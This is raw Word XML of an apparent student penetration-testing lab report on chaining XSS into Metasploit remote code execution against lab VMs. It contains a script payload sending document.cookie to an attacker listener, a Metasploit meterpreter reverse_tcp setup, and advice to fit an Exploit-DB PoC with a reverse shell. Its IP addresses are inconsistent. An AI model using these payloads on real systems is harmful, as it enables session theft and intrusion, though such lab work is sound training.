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8A149" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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9B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Practical Application — VAPT Lab Report &amp; Step-by-Step Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618611EF" w14:textId="77777777" w:rsidR="00445807" w:rsidRDefault="00445807" w:rsidP="009B72D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672179C" w14:textId="26609021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9B72D7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Advanced Exploitation Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC0C0D" w14:textId="77777777" w:rsidR="00445807" w:rsidRDefault="00445807" w:rsidP="009B72D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2009F7A" w14:textId="4EC8E626" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Chained Exploit on Web Server</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Lab network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF2E310" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Attacker (Kali): 198.168.178.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDAB2F" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Exploit host (Metasploit controller VM): 198.168.178.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65F7CC" w14:textId="4F3D677D" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr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Target (Metasploitable2 / DVWA etc): 198.168.178.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w: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IN"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D866B0D" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D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4E035B5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Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879507A" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Build and execute an exploit chain (XSS → session theft → RCE using Metasploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A59BC6" w14:textId="1D151CC8" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr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Log results and produce an actionable remediation list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC20FA" w14:textId="4A1BA080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F19D3F6" w14:textId="00DB1CD4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Lab Setup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE57219" w14:textId="7660ECF7" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Start target VM and confirm IP (example target 198.168.178.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095716A2" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Ensure Metasploit service is reachable from Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BE78A" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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ping -c 3 198.168.178.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379FE378" w14:textId="3F7152E5" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr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R</w:t>
      </w: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un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msfconsole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on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE647A4" w14:textId="20E91F0D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C571847" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="00445807" w:rsidRDefault="009B72D7" w:rsidP="009B72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Step-by-Step Procedure (XSS → RCE chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD86AC" w14:textId="77777777" w:rsidR="00445807" w:rsidRPr="009B72D7" w:rsidRDefault="0044580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44B0A06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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A. Reconnaissance (Kali: 198.168.178.133)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B7CA11" w14:textId="77777777" w:rsidR="00121BEC" w:rsidRPr="00121BEC" w:rsidRDefault="00121BEC" w:rsidP="00121BEC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BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>From Kali (198.168.178.133) — ping target to confirm connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFBD74" w14:textId="77777777" w:rsidR="00121BEC" w:rsidRPr="00121BEC" w:rsidRDefault="00121BEC" w:rsidP="00DB254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BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ping -c 3 198.168.178.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3C55C" w14:textId="77777777" w:rsidR="00121BEC" w:rsidRPr="00121BEC" w:rsidRDefault="00121BEC" w:rsidP="00121BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Quick port/service discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7396E" w14:textId="77777777" w:rsidR="00121BEC" w:rsidRPr="00121BEC" w:rsidRDefault="00121BEC" w:rsidP="00DB254B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1BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --min-rate=1000 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap_allports.txt 198.168.178.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44599703" w14:textId="1B3583F5" w:rsidR="00121BEC" w:rsidRPr="00121BEC" w:rsidRDefault="00121BEC" w:rsidP="00DB254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121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap_svc_scripts.txt 198.168.178.129</w:t>
      </w:r>
      <w:r w:rsidRPr="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65722525" w14:textId="171A2206" w:rsidR="00445807" w:rsidRPr="009B72D7" w:rsidRDefault="0044580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1E74DE71" wp14:editId="19EBE38A">
            <wp:extent cx="5733415" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="164340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" b="21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354E2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7057074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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>B. Identify XSS (Manual + Burp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7C0F9" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Start Burp Suite on Kali, set browser proxied to Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1272D817" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr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Navigate to suspected form/page and send the request to Repeater. Try basic payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0065DC" w14:textId="133D2226" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="00521904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>='http://198.168.178.1</w:t>
      </w:r>
      <w:r w:rsidR="00521904">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:8000/steal?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C89CC" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="00521904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13DBC14" w14:textId="3BDF2EA0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C. Steal session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9B553" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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sudo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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D0C253" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="00521904" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr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Use the XSS to exfiltrate cookie to 198.168.178.133:8000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A494E36" w14:textId="6D1A23D5" w:rsidR="00521904" w:rsidRPr="00521904" w:rsidRDefault="00DB254B" w:rsidP="00DB254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3BB3B0E2" wp14:editId="1FA19FF7">
            <wp:extent cx="5728970" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
            <wp:docPr id="231171349" name="Picture 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71349" name="Picture 2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3D8E0B84" w14:textId="37BBCA36" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="0052190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D. Convert stolen session to RCE using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9EA9A" w14:textId="77777777" w:rsidR="0058251A" w:rsidRDefault="009B72D7" w:rsidP="00521904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:num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If the application allows session-fixation or use of session cookie to access admin panel, use stolen cookie in a browser (or in Burp) to gain elevated access. Document the cookie and resulting admin actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36159778" w14:textId="0DE2B990" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="0058251A">
      <w:pPr>
        <w:spacing w:line="360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19A260E5" w14:textId="1AF6E331" w:rsidR="009B72D7" w:rsidRDefault="00521904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M</w:t>
      </w:r>
      <w:r w:rsidR="009B72D7" w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C769E01" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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use exploit/multi/http/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some_vuln_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D983F9D" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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set RHOST 198.168.178.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD4D2B" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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set RPORT 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23162A03" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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set PAYLOAD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linux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>/x86/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meterpreter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>/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24568231" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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set LHOST 198.168.178.133   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CD681F" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54202A54" w14:textId="77777777" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904" w:rsidP="005219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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B80AED3" w14:textId="65FAC3D1" w:rsidR="00521904" w:rsidRPr="009B72D7" w:rsidRDefault="00521904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483794F" w14:textId="00E682AE" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="0052190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861B7F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4762311B" wp14:editId="262FEE68">
            <wp:extent cx="5733415" cy="2901315"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="84113252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132521" name="Picture 1" descr="A screen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61B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128AF7C3" w14:textId="77777777" w:rsidR="00521904" w:rsidRDefault="00521904" w:rsidP="009B72D7">
      <w:pPr>
        <w:spacing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  <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7B96AA" w14:textId="78C6C7B8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PoC Customization (Exploit-DB Python PoC) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FB99E" w14:textId="40D16120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Modify network parameters to target 198.168.178.150, change vulnerable endpoint path and HTTP headers to match application </w:t>
      </w:r>
      <w:r w:rsidR="00861B7F" w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, add randomized user-agent and retry logic, and replace hardcoded payload with a controlled reverse-shell that connects back to 198.168.178.133 on port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E60B5FE" w14:textId="0FA08BD8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F329AB4" w14:textId="6D69D1BF" w:rsid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Exploit Log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A2766" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F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Style w:val="GridTable3"/>
        <w:tblW w:w="8886" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1366"/>
        <w:gridCol w:w="2876"/>
        <w:gridCol w:w="2049"/>
        <w:gridCol w:w="1089"/>
        <w:gridCol w:w="1506"/>
      </w:tblGrid>
      <w:tr w:rsidR="00861B7F" w:rsidRPr="009B72D7" w14:paraId="58FD3BA0" w14:textId="77777777" w:rsidTr="00861B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365C588" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72D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Exploit ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3257B997" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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6A779EC2" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A126E91" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00286E59" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00861B7F" w:rsidRPr="009B72D7" w14:paraId="3390221B" w14:textId="77777777" w:rsidTr="00861B7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E55254" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72D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004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="499414E4" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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XSS → Session → RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F24765" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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198.168.178.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A9BBFD" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F9DD1FE" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="786FB960" w14:textId="53E63A69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F836B51" w14:textId="77777777" w:rsidR="00861B7F" w:rsidRDefault="00861B7F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1279920" w14:textId="39904A69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B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Web Application Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA62FE" w14:textId="7E429E44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Goal: Find OWASP Top 10 issues on DVWA (example target 198.168.178.1</w:t>
      </w:r>
      <w:r w:rsidR="009E39E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7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5FB48097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Test Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB60449" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Tools: Burp Suite,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sqlmap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>, OWASP ZAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF3FC9" w14:textId="5065653A" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Target DVWA login page: http://198.168.178.1</w:t>
      </w:r>
      <w:r w:rsidR="009E39E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
